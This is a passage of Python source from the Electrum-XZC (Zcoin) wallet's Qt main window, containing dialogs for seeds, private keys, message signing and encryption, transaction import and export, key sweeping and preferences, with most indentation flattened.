grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zcoin address.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_xzc.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_xzc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("zcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum_xzc.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum_xzc.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum_xzc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-xzc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
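        # The worker thread exports one key at a time and reports progress to the
        # GUI thread via signals; the done/cancelled flags let the dialog close
        # cleanly while the export is still running.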
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum-xzc_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-xzc-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_xzc.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_xzc.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
            index = list(languages.keys()).index(self.config.get("language", ''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
            _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mXZC/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['XZC', 'mXZC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1XZC=1000mXZC.\n' \
            + _('These settings affect the fields in the Send tab') + ' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
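            # decimal_point is the number of satoshi decimal places shown:
            # 8 -> XZC, 5 -> mXZC, 2 -> bits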
if unit_result == 'XZC':
self.decimal_point = 8
elif unit_result == 'mXZC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_xzc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
